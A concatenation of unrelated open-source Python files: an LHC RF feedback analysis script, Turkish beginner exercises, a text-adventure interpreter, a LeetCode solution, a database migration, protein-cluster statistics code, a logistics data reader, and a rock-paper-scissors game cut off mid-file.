np.array([0, +3, -3])\nnames = ['Base', '+3 dB', '-3 dB']\n\nn = 1\nHs = []\nfreqs = []\n\nfor i in range(len(names)):\n G_a = 6.8e-6\n G_a_in_dB = sut.linear_to_dB(G_a) + gain[i]\n G_a = sut.dB_to_linear(G_a_in_dB)\n print(G_a, phase[i])\n # Cavity Controller\n RFFB = LHCRFFeedback(open_loop=False, open_otfb=True, excitation=True,\n G_a=G_a, G_d=10, tau_a=170e-6, tau_d=400e-6,\n d_phi_ad=phase[i])\n\n CL = LHCCavityLoop(rf, profile, G_gen=1, f_c=rf.omega_rf[0,0]/(2*np.pi),\n I_gen_offset=0, n_cav=8, Q_L=60000, R_over_Q=45,\n tau_loop=650e-9,\n n_pretrack=1, RFFB=RFFB)\n\n # Noise Injection -------------------------------------------------------------------------------------------------\n CL.track_no_beam_excitation(n_turns=100 * n)\n\n TF = TransferFunction(CL.V_EXC_IN, CL.V_EXC_OUT, T_s=CL.T_s, plot=PLT_MODEL_TF)\n TF.analyse(data_cut=0)\n\n print(names[i])\n Hs.append(TF.H_est)\n freqs.append(TF.f_est)\n\nHs = np.array(Hs, dtype=complex)\nfreqs = np.array(freqs)\n\nf_s = 1e-6\nplt.figure()\nplt.title('Closed Loop Response')\ncolors = ['black', 'r', 'b', 'g', 'y']\n\nfor i in range(len(names)):\n plt.plot(freqs[i, :] * f_s, 20 * np.log10(np.abs(Hs[i, :])), label=names[i], color=colors[i])\n\nplt.xlim((-1.5e6 * f_s, 1.5e6 * f_s))\nplt.ylim((-25, 3))\nplt.xlabel(r'Frequency [MHz]')\nplt.ylabel(r'Gain [dB]')\nplt.legend()\n\n\n\nplt.show()","repo_name":"BirkKarlsen/LHC_RFFB","sub_path":"analysis_files/noise_injection/closed_loop_transfer_function_variations.py","file_name":"closed_loop_transfer_function_variations.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26019464226","text":"def seslisesizharfsayısı(metin):\n # Kullanıcıdan bİr metin girmesini isteyen ve girilen bu metinde bulunan sesli-sessiz harflerin sayısını ekranda\n sesli_harfler = [\"a\", \"e\", \"i\", \"ı\", \"o\", \"ö\", \"u\", \"ü\"]\n sesli_sayisi = 0\n sessiz_sayisi = 0\n\n for harf in metin:\n if harf.isalpha():\n if harf.lower() in sesli_harfler:\n # sesli_sayisi = sesli_sayisi +1\n sesli_sayisi += 1\n else:\n sessiz_sayisi += 1\n print(\"Sesli harf sayısı : \", sesli_sayisi)\n print(\"Sessiz harf sayısı: \", sessiz_sayisi)\n\n\n# metin = input(\"Bir metin girin : \\n \")\n# seslisesizharfsayısı(metin)\n\n\ndef fibonacci():\n n = int(input(\"Kac adet fibbonaci sayisi yazilsin: \")) # 0 1 1 2 3 5 8\n # sayi1 = 0\n # sayi2 = 1\n sayi1, sayi2 = 0, 1\n if n == 1:\n print(sayi1)\n elif n == 2:\n print(sayi1, sayi2)\n else:\n print(sayi1, sayi2, end=\" \")\n for i in range(n - 2):\n sayi3 = sayi1 + sayi2\n print(sayi3, end=\" \")\n sayi1, sayi2 = sayi2, sayi3\n\n\n# fibonacci()\n\n\ndef atm():\n bakiye = 500\n while 1:\n print(\"\"\"\n İşlemler:\n\n 1. Bakiye Sorgulama\n 2. Para Yatırma\n 3. Para Çekme\n\n Programdan 'q' tuşu ile çıkabilirsiniz.\n \"\"\")\n işlem = input(\"İşlemi giriniz: \")\n\n if işlem == \"q\":\n print(\"güle güle\")\n break\n elif işlem == \"1\":\n print(f\"Bakiyeniz {bakiye} liradir\")\n elif işlem == \"2\":\n miktar = float(input(\"Tutar: \"))\n bakiye += miktar\n elif işlem == \"3\":\n miktar = float(input(\"Tutar: \"))\n if (bakiye - miktar) < 0:\n print(f\"{miktar} kadar para çekmezsiniz\")\n print(f\"Bakiyeniz {bakiye} liradir\")\n continue\n bakiye -= miktar\n else:\n print(\"Hatalı İşlem\")\natm()\n","repo_name":"TurgayBugraBayram/PythonDersleri","sub_path":"10. Örnek Sorular.py","file_name":"10. Örnek Sorular.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5206404301","text":"from sys import argv, stdout, exit\nfrom time import sleep\nfrom os.path import isfile, abspath\nimport re\nimport pickle\nfrom colorama import Fore\nfrom os import environ\nenviron['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\nfrom pygame.mixer import music, init\n\ndef init_in_game_vars(gest_file):\n in_game_vars['gest_file'] = abspath(gest_file)\n in_game_vars['line_index'] = 0\n in_game_vars['gsav_file'] = abspath(gest_file)[:-4] + 'gsav'\n in_game_vars['_scene_return'] = []\n return\n\ndef save():\n gsav_file.seek(0)\n pickle.dump(in_game_vars, gsav_file)\n\ndef trim(str):\n begin = 0\n end = len(str)\n for i, c in enumerate(str):\n if(c != ' '):\n begin = i\n break\n for i, c in enumerate(reversed(str)):\n if(c != ' '):\n end = len(str)-i\n break\n return str[begin:end]\n\ndef block(str, lines):\n jump_index = 0\n for i in range(in_game_vars['line_index']+1, len(lines)):\n if re.match(r' *\\[ *'+str+r' *\\]', lines[i]):\n jump_index = i+1\n break\n else:\n print(Fore.RED + \"\\n\\nScript Error: \" + Fore.RESET +\"[\"+ str +\"] not found\")\n exit()\n return jump_index\n\ndef txtout(txt):\n\n '''\n EMBEDDED VARIBLE\n Syntax:\n some text {var} some text...\n for example:\n My name is {name}\n '''\n embedded_var = re.findall(r'\\{ *([a-zA-Z0-9_]*) *\\}', txt)\n for var in embedded_var:\n txt = re.sub(r'(\\{ *'+var+' *\\})', in_game_vars[var], txt, count = 1)\n\n for char in txt:\n print(char, end='')\n stdout.flush()\n sleep(0.02)\n\ndef play():\n if '_bg_music' in in_game_vars:\n music.load(in_game_vars['_bg_music'][0])\n music.play(in_game_vars['_bg_music'][1])\n with open(in_game_vars['gest_file'], 'r') as f:\n lines = f.readlines()\n line_index = in_game_vars['line_index']\n while(True):\n in_game_vars['line_index'] = line_index\n save()\n if(line_index >= len(lines)):\n break\n line = lines[line_index]\n\n # COMMENTS\n if('#' in line):\n if (trim((lines[line_index])).startswith('#')):\n line_index += 1\n continue\n else:\n chr_index = line.find('#')\n line = line[:chr_index] + '\\n'\n\n '''\n COMMAND WITH VARIABLE\n Syntax:\n [command: var] text\n for example:\n [input: name] Enter your name:\n '''\n com = re.search(r'\\[ *([a-zA-Z_]*) *: *(.+?) *\\] *(.*)', line)\n if com:\n command = com.group(1)\n var = com.group(2)\n prompt = com.group(3)\n if(command == 'input'):\n '''\n INPUT COMMAND\n Syntax:\n [input: var] some text\n for example:\n [input: name] Enter your name:\n\n The name will be stored in the varible 'name' which\n can be accessed by `{name}`\n '''\n txtout(prompt + ' ')\n in_game_vars[var] = input()\n line_index += 1\n continue\n\n elif(command == 'yes_or_no'):\n '''\n YES_OR_NO COMMAND\n Syntax:\n [yes_or_no: var] some question\n for example:\n [yes_or_no: p] Are you ready to proceed\n while playing the above example yould be displayed\n as:\n Are you ready to proceed (y/n):\n '''\n txtout(prompt + ' (y/n): ')\n inp = input()\n if inp == 'y':\n in_game_vars[var] = 'yes'\n elif inp == 'n':\n in_game_vars[var] = 'no'\n else:\n txtout(Fore.YELLOW + \"\\nInvalid input:\"+ Fore.RESET +\" Try again\\n\\n\")\n continue\n line_index += 1\n continue\n elif command == 'musicloop':\n if '_bg_music' in in_game_vars:\n music.fadeout(1000)\n music.load(var)\n music.play(-1)\n in_game_vars['_bg_music'] = [var, -1]\n line_index += 1\n continue\n elif command == 'music':\n if '_bg_music' in in_game_vars:\n music.fadeout(1000)\n music.load(var)\n music.play()\n in_game_vars['_bg_music'] = [var, 0]\n line_index += 1\n continue\n elif command == 'play':\n in_game_vars['_scene_return'].append(line_index+1)\n for l in range(len(lines)):\n if re.match(r' *\\[ *scene *: *'+ var + r' *\\]', lines[l]):\n line_index = l+1\n break\n else:\n print(Fore.RED+\"\\nScript Error:\"+Fore.RESET+\" Scene `\"+scene_name+\"` is not defined\")\n exit()\n continue\n\n '''\n VARIABLE EQUALITY CONDITION\n Syntax:\n [{var} value]\n ...\n [endblock]\n\n (OR)\n\n [{var} \"value\"]\n ...\n [endblock]\n\n (OR)\n\n [{var} 'value']\n ...\n [endblock]\n '''\n con = re.search(r'\\[ *\\{([a-zA-Z0-9_]*)\\} +\\'?([^\\']*)\\'? *\\]', line)\n if con:\n if in_game_vars[con.group(1)] == con.group(2):\n line_index += 1\n continue\n\n else:\n line_index = block('endblock', lines)+1\n continue\n\n directive = re.search('\\[ *([a-zA-Z_]*) *\\]', line)\n if directive:\n name = directive.group(1)\n if name == 'endscene':\n line_index = in_game_vars['_scene_return'].pop()\n # pop() returns and removes the last indice\n continue\n elif name == 'endblock':\n line_index += 1\n continue\n elif name == 'abort':\n break\n elif name == 'stopmusic':\n music.fadeout(1000)\n in_game_vars.pop('_bg_music')\n line_index += 1\n continue\n\n if re.match(r' *\\[ *scene *: *([a-zA-Z0-9_-]*) *\\]', line):\n line_index = block('endscene', lines)+1\n continue\n\n txtout(trim(line))\n line_index += 1\n save()\n\ndef main():\n global in_game_vars\n global gsav_file\n in_game_vars = {}\n if len(argv)<2:\n print(Fore.RED + \"\\nError:\" + Fore.RESET + \" Argument not provided\")\n exit()\n file = argv[1]\n if not(isfile(file)):\n print(Fore.RED + \"\\nError:\" + Fore.RESET + \" This file cannot be located\")\n exit()\n try:\n if(file.endswith('.gest')):\n init_in_game_vars(file)\n gsav_file = open(in_game_vars['gsav_file'], 'wb')\n init() # for music\n play()\n gsav_file.close()\n elif(file.endswith('.gsav')):\n with open(file, 'rb') as sf:\n in_game_vars = pickle.load(sf)\n gsav_file = open(in_game_vars['gsav_file'], 'wb')\n init() # for music\n play()\n gsav_file.close()\n else:\n print(Fore.RED + \"\\nError:\" + Fore.RESET + \" Unrecognized file type. \\\nOnly .gest and .gsav file extentions are supported\")\n except KeyboardInterrupt:\n gsav_file.close()\n exit()\n # exit the game in case the user press `ctrl+C` which raises a KeyboardInterrupt\n\nif __name__=='__main__':\n main()\n","repo_name":"etcetra7n/gest","sub_path":"src/gest.py","file_name":"gest.py","file_ext":"py","file_size_in_byte":8262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"364197085","text":"\"\"\"\n107. Binary Tree Level Order Traversal II\nGiven a binary tree, return the bottom-up level order traversal of its nodes' values. (ie, from left to right, level by level from leaf to root).\n\nFor example:\nGiven binary tree [3,9,20,null,null,15,7],\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn its bottom-up level order traversal as:\n[\n [15,7],\n [9,20],\n [3]\n]\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\n# Time complexity: O(N)\n# Space complexity: O(N)\nclass Solution:\n def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:\n queue = [root]\n level_order = []\n \n while queue:\n layer_size = len(queue)\n layer = []\n for i in range(layer_size):\n front = queue.pop()\n if front:\n layer.append(front.val)\n queue.insert(0, front.left)\n queue.insert(0, front.right)\n if layer:\n level_order.append(layer)\n \n level_order.reverse()\n return level_order\n","repo_name":"victorplusc/Algorithms","sub_path":"Leetcode/107. Binary Tree Level Order Traversal II.py","file_name":"107. Binary Tree Level Order Traversal II.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"18338201512","text":"import matplotlib.pyplot as plt\nimport statistics\nimport numpy as np\nfrom CDHIT_Parser import CDHIT_Parser\nimport collections\nimport pandas as pd\nfrom collections import Counter\n\n\nclass Artifact:\n # artifacts!!!!!\n global listOfClusters, minMemberLength, maxMemberLength, mean, std, strainsPerCluster, genesPerCluster, \\\n avgMembersPerCluster, listOfStrains, flagPerCluster, most_common_length_dict, listOfClass0, listOfClass2, \\\n listOfClass3, listOfClass4, listOfClass5, singletons, sum_of_core_clusters\n\n def __init__(self, path, strains):\n self.listOfClusters = CDHIT_Parser(path, strains)\n self.listOfStrains = strains\n self.sum_of_core_clusters = 0\n self.minMemberLength = {}\n self.maxMemberLength = {}\n self.mean = {}\n self.std = {}\n self.genesPerCluster = {}\n self.strainsPerCluster = {}\n self.avgMembersPerCluster = {}\n self.flagPerCluster = {}\n self.listOfClass0 = []\n self.listOfClass2 = []\n self.listOfClass3 = []\n self.listOfClass4 = []\n self.listOfClass5 = []\n self.most_common_length_dict = self.calculatingLengthDistributionOfEachCluster()\n self.variableLength()\n self.getGenesPerCluster()\n self.singletons = self.getSingleClusters()\n self.getStrainsPerCluster()\n self.calcAverageMemberPerCluster()\n self.calcFlagPerCluster()\n\n\n \"\"\"\n This is a part of the first steps about the statistic.\n To identify the amount of members in each cluster, this function return a dictionary with \n key- cluster ID and value- the number of proteins members of this cluster \n \"\"\"\n def getGenesPerCluster(self):\n for cluster in self.listOfClusters.clusters.keys():\n dict_members = self.listOfClusters.getClusterMembers(cluster)\n self.genesPerCluster[cluster] = len(dict_members)\n\n return self.genesPerCluster\n\n \"\"\"\n This is a part of the first steps about the statistic.\n To identify the amount of different strains in each cluster, this function return a dictionary with \n key- cluster ID and value- list with size of 2, the first cell is the strain ID and the second cell is the frequency \n of this strain in this cluster \n \"\"\"\n def getStrainsPerCluster(self):\n for cluster in self.listOfClusters.clusters.keys():\n listOfDifferentStrains = []\n dict_members = self.listOfClusters.getClusterMembers(cluster)\n for member in dict_members.values():\n listOfDifferentStrains.append(member.getStrainInd)\n x = np.array(listOfDifferentStrains)\n unique, counts = np.unique(x, return_counts=True)\n self.strainsPerCluster[cluster] = np.asarray((unique, counts)).T\n\n return self.strainsPerCluster\n\n def getMinMembersPerStrainPerCluster(self, cluster):\n\n numOfMemberPerStrain = []\n for x in self.strainsPerCluster[cluster]:\n numOfMemberPerStrain.append(x[1])\n\n return min(numOfMemberPerStrain)\n\n def getMaxMembersPerStrainPerCluster(self, cluster):\n\n numOfMemberPerStrain = []\n for x in self.strainsPerCluster[cluster]:\n numOfMemberPerStrain.append(x[1])\n\n return max(numOfMemberPerStrain)\n\n def getSTDMembersPerStrainPerCluster(self, cluster):\n\n numOfMemberPerStrain = []\n for x in self.strainsPerCluster[cluster]:\n numOfMemberPerStrain.append(x[1])\n # print(x)\n # print(numOfMemberPerStrain)\n # print(len(numOfMemberPerStrain))\n # a = [1,2]\n # print(statistics.stdev(a))\n # print(statistics.stdev(1,1))\n if len(numOfMemberPerStrain) < 2:\n return 0\n\n return statistics.stdev(numOfMemberPerStrain)\n\n \"\"\"\n This is a part of the first steps about the statistic.\n To identify all the clusters with one member, this function return a list with all clusters ID's that contains a \n single member \n \"\"\"\n def getSingleClusters(self):\n singletons = []\n for cluster in self.listOfClusters.clusters.keys():\n dict_members = self.listOfClusters.getClusterMembers(cluster)\n if len(dict_members) == 1:\n singletons.append(cluster)\n\n return singletons\n\n \"\"\"\n This function export to a csv file the amount of clusters who contains the same amount of different strains.\n \"\"\"\n def clustersPerCountOfStrains(self):\n frequency = []\n for strainFreq in self.strainsPerCluster.values():\n frequency.append(len(strainFreq))\n x = np.array(frequency)\n #unique- count of different strains. counts- frequencies\n unique, counts = np.unique(x, return_counts=True)\n\n \"\"\"\n statistic about the first artifact - Variable Length.\n Show graph plotting to the std about the length of proteins inside cluster.\n Show graph plotting to the mean about the length of proteins inside cluster.\n This graphs for further study.\n \"\"\"\n def variableLength(self):\n for cluster in self.listOfClusters.clusters.keys():\n data = []\n dict_members = self.listOfClusters.getClusterMembers(cluster)\n #if for this cluster exist only one member\n if len(dict_members) < 2:\n continue\n for member in dict_members.values():\n data.append(member.getLength)\n self.minMemberLength[cluster] = min(data)\n self.maxMemberLength[cluster] = max(data)\n self.mean[cluster] = statistics.mean(data)\n self.std[cluster] = statistics.stdev(data)\n self.mean = {k: v for k, v in sorted(self.mean.items(), key=lambda item: item[1])}\n self.std = {k: v for k, v in sorted(self.std.items(), key=lambda item: item[1])}\n\n \"\"\"\n This function export to a csv file the average of cluster members for each cluster. \n \"\"\"\n def calcAverageMemberPerCluster(self):\n\n for cluster in self.genesPerCluster.keys():\n geneCount = self.genesPerCluster.get(cluster)\n strainCount = len(self.strainsPerCluster[cluster])\n self.avgMembersPerCluster[cluster] = geneCount / strainCount\n\n def isCoreCluster(self, cluster):\n\n counter = 0\n for i in self.strainsPerCluster[cluster]:\n if i[1] == 1:\n counter = counter + 1\n\n if counter / len(self.listOfStrains) >= 0.9:\n return True\n\n return False\n\n def avgIdentity(self, cluster):\n\n dict_member = self.listOfClusters.getClusterMembers(cluster)\n list_identity = []\n for member in dict_member.values():\n list_identity.append(member.getIdentity)\n\n return statistics.mean(list_identity)\n\n def stdIdentity(self, cluster):\n\n dict_member = self.listOfClusters.getClusterMembers(cluster)\n list_identity = []\n for member in dict_member.values():\n list_identity.append(member.getIdentity)\n\n return statistics.stdev(list_identity)\n\n #% of members with %score 70-80\n def PercentOfMembersWithC_Score(self, cluster):\n\n counter = 0\n dict_member = self.listOfClusters.getClusterMembers(cluster)\n for member in dict_member.values():\n if 70 <= member.getIdentity < 80:\n counter = counter + 1\n\n return (counter / len(dict_member)) * 100\n\n # % of members with %score 80-90\n def PercentOfMembersWithB_Score(self, cluster):\n\n counter = 0\n dict_member = self.listOfClusters.getClusterMembers(cluster)\n for member in dict_member.values():\n if 80 <= member.getIdentity < 90:\n counter = counter + 1\n\n return (counter / len(dict_member)) * 100\n\n # % of members with %score 90-100\n def PercentOfMembersWithA_Score(self, cluster):\n\n counter = 0\n dict_member = self.listOfClusters.getClusterMembers(cluster)\n for member in dict_member.values():\n if 90 <= member.getIdentity <= 100:\n counter = counter + 1\n\n return (counter / len(dict_member)) * 100\n\n\n def updateNumOfCoreGeneInStrains(self):\n # for cluster in self.listOfClusters.clusters.keys():\n # if self.isCoreCluster(cluster):\n # for strain in self.getStrainsPerCluster():\n for cluster in self.listOfClusters.clusters.keys():\n if self.isCoreCluster(cluster):\n strainListPerCluster = self.strainsPerCluster[cluster]\n for strain in strainListPerCluster:\n self.listOfStrains.get(strain[0]).increaseNumOfCoreGenes()\n # print(self.listOfStrains.get(strain[0]).numOfCoreGenes)\n\n def getNeighbours(self, member):\n neighbours_dict = {} # key- StrainInd/ProteinInd, val-locus_tag\n for i in range(5):\n i = i + 1\n if self.listOfStrains.get(member.getStrainInd).getProteins()['locus_tag'][member.getProteinInd + i] is not None:\n neighbours_dict[str(member.getStrainInd) + '/' + str(member.getProteinInd + i)] = \\\n self.listOfStrains.get(member.getStrainInd).getProteins()['locus_tag'][member.getProteinInd + i]\n if self.listOfStrains.get(member.getStrainInd).getProteins()['locus_tag'][member.getProteinInd - i] is not None:\n neighbours_dict[str(member.getStrainInd) + '/' + str(member.getProteinInd - i)] = \\\n self.listOfStrains.get(member.getStrainInd).getProteins()['locus_tag'][member.getProteinInd - i]\n\n return neighbours_dict\n\n\n def getNeighborsClusters(self, _member):\n neighbors_clusters_dict = {}\n neighbors_dict = self.getNeighbours(_member)\n\n for neighbour in neighbors_dict.keys():\n neighbors_clusters_dict[neighbour] = set()\n\n for cluster in self.listOfClusters.clusters.keys():\n dict_members = self.listOfClusters.getClusterMembers(cluster)\n for member in dict_members.values():\n possible_key = str(member.getStrainInd) + '/' + str(member.getProteinInd)\n if possible_key in neighbors_dict:\n neighbors_clusters_dict[possible_key].add(cluster)\n return neighbors_clusters_dict\n\n def getClusterList(self):\n return self.listOfClusters.clusters\n\n def calcFlagPerCluster(self):\n for cluster in self.listOfClusters.clusters.keys():\n dict_members = self.listOfClusters.getClusterMembers(cluster)\n # if for this cluster exist only one member\n if len(dict_members) >= 2:\n flag = 0\n if len(self.strainsPerCluster[cluster]) == 1 and len(\n self.listOfClusters.getClusterMembers(cluster)) > 1:\n flag = 2\n if self.getMaxMembersPerStrainPerCluster(cluster) == 1:\n flag = 3\n if flag == 3 and 30 <= self.most_common_length_dict[cluster]['%_1'] < 100:\n flag = 4\n if flag == 3 and self.most_common_length_dict[cluster]['%_1'] < 30:\n flag = 5\n # self.flagPerCluster[cluster] = flag\n # print(cluster)\n if flag == 0:\n self.listOfClass0.append(cluster)\n if flag == 2:\n self.listOfClass2.append(cluster)\n if flag == 3:\n self.listOfClass3.append(cluster)\n if flag == 4:\n self.listOfClass4.append(cluster)\n if flag == 5:\n self.listOfClass5.append(cluster)\n\n # for cluster in self.artifacts.listOfClusters.clusters.keys():\n\n # dict_members = self.artifacts.listOfClusters.getClusterMembers(cluster)\n # # if for this cluster exist only one member\n # if len(dict_members) < 2:\n # True\n # # self.reportToClustersWithOneMember(cluster)\n # # elif len(self.artifacts.strainsPerCluster[cluster]) == 1 and len(\n # # self.artifacts.listOfClusters.getClusterMembers(cluster)) > 1:\n # # # flag ==2\n # # True\n # else:\n # flag = 0\n # # write clusters from class 2 in the report, to check if it can be deleted?\n # if len(self.artifacts.strainsPerCluster[cluster]) == 1 and len(\n # self.artifacts.listOfClusters.getClusterMembers(cluster)) > 1:\n # flag = 2\n # if self.artifacts.getMaxMembersPerStrainPerCluster(cluster) == 1:\n # flag = 3\n # if flag == 3 and 30 <= self.most_common_length_dict[cluster]['%_1'] < 100:\n # flag = 4\n # if flag == 3 and self.most_common_length_dict[cluster]['%_1'] < 30:\n # flag = 5\n\n def calculatingLengthDistributionOfEachCluster(self): #top 3\n most_common_length_dict = {}\n for cluster in self.listOfClusters.clusters:\n length_freq = []\n dict_members = self.listOfClusters.getClusterMembers(cluster)\n if len(dict_members) > 1:\n for member in dict_members.values():\n length_freq.append(member.getLength)\n df = pd.DataFrame(length_freq, columns=['strain index'])\n counts = df['strain index'].value_counts().to_dict()\n c = Counter(counts)\n top3 = c.most_common(3)\n if len(top3) == 1:\n most_common_length_dict[cluster] = {'length_1': top3[0][0],\n '%_1': (top3[0][1] / len(dict_members)) * 100,\n 'length_2': 0, '%_2': 0,\n 'length_3': 0, '%_3': 0}\n elif len(top3) == 2:\n most_common_length_dict[cluster] = {'length_1': top3[0][0],\n '%_1': (top3[0][1] / len(dict_members)) * 100,\n 'length_2': top3[1][0],\n '%_2': (top3[1][1] / len(dict_members)) * 100,\n 'length_3': 0, '%_3': 0}\n elif len(top3) == 3:\n most_common_length_dict[cluster] = {'length_1': top3[0][0],\n '%_1': (top3[0][1] / len(dict_members)) * 100,\n 'length_2': top3[1][0],\n '%_2': (top3[1][1] / len(dict_members)) * 100,\n 'length_3': top3[2][0],\n '%_3': (top3[2][1] / len(dict_members)) * 100}\n return most_common_length_dict\n\n def updateSingletonsStrainCount(self):\n singleton_strains = []\n clustersFromClass1 = self.singletons\n # countOfSingletonsClass2 = len(clustersFromClass2)\n # print(singletons)\n # print(clustersFromClass2)\n # print(merge)\n\n for cluster in clustersFromClass1:\n members = self.listOfClusters.getClusterMembers(cluster)\n for member in members.values():\n if member.getStrainInd in self.listOfStrains.keys():\n self.listOfStrains.get(member.getStrainInd).setNumOfSingleton(1)\n break\n\n def increase_sum_of_core_clusters(self):\n self.sum_of_core_clusters = self.sum_of_core_clusters + 1","repo_name":"nitzansa/FinalProject","sub_path":"Artifacts.py","file_name":"Artifacts.py","file_ext":"py","file_size_in_byte":15601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35302925916","text":"\"\"\"'first'\n\nRevision ID: 7a4fb9fe6f21\nRevises: \nCreate Date: 2023-03-02 06:40:23.250108\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7a4fb9fe6f21'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('game_library',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('game_title', sa.String(length=140), nullable=True),\n sa.Column('genre', sa.String(length=40), nullable=True),\n sa.Column('rating', sa.String(length=10), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=64), nullable=True),\n sa.Column('last_name', sa.String(length=64), nullable=True),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password_hash', sa.String(length=120), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('first_name'),\n sa.UniqueConstraint('last_name'),\n sa.UniqueConstraint('username')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('user')\n op.drop_table('game_library')\n # ### end Alembic commands ###\n","repo_name":"Pipperonni/flaskupgradedflaskgame","sub_path":"migrations/versions/7a4fb9fe6f21_first.py","file_name":"7a4fb9fe6f21_first.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32475824599","text":"from data_reader.input_data import StaticData\nimport pandas as pd\nfrom integral_planning.functions import day_calculation_by_shift\n\n\nclass IntegralRead:\n def __init__(self, path, data: StaticData, period_start: int):\n self.path = path\n self.data = data\n self.period_start = period_start\n self.pd_flows = pd.DataFrame\n self.departures = {}\n\n 'Read data'\n self.read_from_xlsx()\n\n def read_from_xlsx(self):\n excel_file = pd.ExcelFile(self.path)\n\n self.pd_flows = excel_file.parse('volumes')\n pd_departures = excel_file.parse('departures')\n\n # =========== Save integral model =============\n writer = pd.ExcelWriter('./output/integral_model_from_%d_to_%d.xlsx' % (self.period_start, self.period_start + self.data.parameters.absolute_period_duration - 1))\n self.pd_flows.to_excel(writer, 'volumes')\n pd_departures.to_excel(writer, 'departures')\n writer.save()\n\n # ==============================================\n pd_departures = pd_departures.groupby(['id_asu', 'time'], as_index=False).sum()\n self.departures = {(int(row['id_asu']), int(row['time'])): int(row['departures']) for idx, row in pd_departures.iterrows()}\n\n def allocation_update(self, time):\n loads = self.pd_flows.loc[self.pd_flows['time'] == time]\n day_number = day_calculation_by_shift(time)\n\n for idx, row in loads.iterrows():\n asu_n_day = (int(row['id_asu']), int(row['n']), time)\n self.data.asu_depot_reallocation[asu_n_day] = int(row['depot'])\n if int(row['depot']) != self.data.asu_depot[int(row['id_asu'])]:\n self.data.asu_reallocated.setdefault(time, []).append(int(row['id_asu']))\n else:\n if int(row['id_asu']) in self.data.asu_reallocated.get(time, []):\n self.data.asu_reallocated[time].remove(int(row['id_asu']))\n","repo_name":"Dizzman/BIA_logistic","sub_path":"gpn_logistic_2.0-cplex_version/integral_planning/integral_read.py","file_name":"integral_read.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19443947359","text":"#!/usr/bin/env python3\n\"\"\"This program plays a game of Rock, Paper, Scissors between two Players.\nThe first player is a computer that is selected\nat random from predefined profiles. While the second player is a human.\nThe human player initially choices if they wish\nto play a game of best out of 1, 3 or 5.\nThe programme keeps track of the players'scores and reports them each round.\"\"\"\nimport random\nimport time\n\n\nmoves = ['rock', 'paper', 'scissors']\n\n\ndef print_pause(message_to_print):\n print(message_to_print)\n time.sleep(2)\n\n\ndef intro():\n print_pause(\"Welcome to my Rock, Paper, \"\n \"Scissors game! You will be facing \"\n \"against a tough computer \"\n \"in just a moment. You will be Player 2 in this game.\")\n\n\ndef number_game():\n while True:\n n = input(\"First, would you like to play a game \"\n \"of best out of 1, 3 or 5? (please \"\n \"enter the digit 1, 3 or 5 to make your choice)\\n\")\n if n == '1' or n == '3' or n == '5':\n return int(n)\n else:\n print(\"I don't understand. Please enter an odd either 1, 3 or 5\")\n\n\nclass Player:\n def move(self):\n return 'rock'\n\n def learn(self, my_move, their_move):\n pass\n\n\nclass RandomPlayer(Player):\n def move(self):\n m = random.choice(moves)\n return m\n\n\nclass HumanPlayer(Player):\n def move(self):\n while True:\n m = input(\"Do you want to play rock, paper or scissors?\\n\").lower()\n if m == \"rock\":\n return moves[0]\n elif m == \"paper\":\n return moves[1]\n elif m == \"scissors\":\n return moves[2]\n else:\n print(\"Sorry I don't understand\")\n\n\nclass ReflectPlayer(Player):\n def __init__(self):\n self.move_temp = random.choice(moves)\n\n def move(self):\n return self.move_temp\n\n def learn(self, my_move, their_move):\n self.move_temp = their_move\n\n\nclass CyclePlayer(Player):\n def __init__(self):\n self.move_temp = random.choice(moves)\n\n def move(self):\n return self.move_temp\n\n def learn(self, my_move, their_move):\n if my_move == moves[0]:\n self.move_temp = moves[1]\n elif my_move == moves[1]:\n self.move_temp = moves[2]\n elif my_move == moves[2]:\n self.move_temp = moves[0]\n\n\ndef beats(one, two):\n return ((one == 'rock' and two == 'scissors') or\n (one == 'scissors' and two == 'paper') or\n (one == 'paper' and two == 'rock'))\n\n\nclass Game:\n def __init__(self, p1, p2, n, score1, score2, counter):\n self.n = n\n self.p1 = p1\n self.p2 = p2\n self.score1 = score1\n self.score2 = score2\n self.counter = counter\n\n def play_round(self):\n move1 = self.p1.move()\n move2 = self.p2.move()\n print(f\"Player 1: {move1} Player 2: {move2}\")\n self.p1.learn(move1, move2)\n self.p2.learn(move2, move1)\n if move1 != move2:\n if beats(move1, move2) is True:\n print(\"Player 1 wins this round!\")\n self.score1.append(1)\n print(\"Current scores: Player 1: \",\n len(self.score1), \", Player 2: \",\n len(self.score2))\n else:\n print(\"Player 2 wins this round!\")\n self.score2.append(1)\n print(\"Current scores: Player 1: \",\n len(self.score1), \", Player 2: \",\n len(self.score2))\n else:\n print(\"It's a tie!\")\n\n def 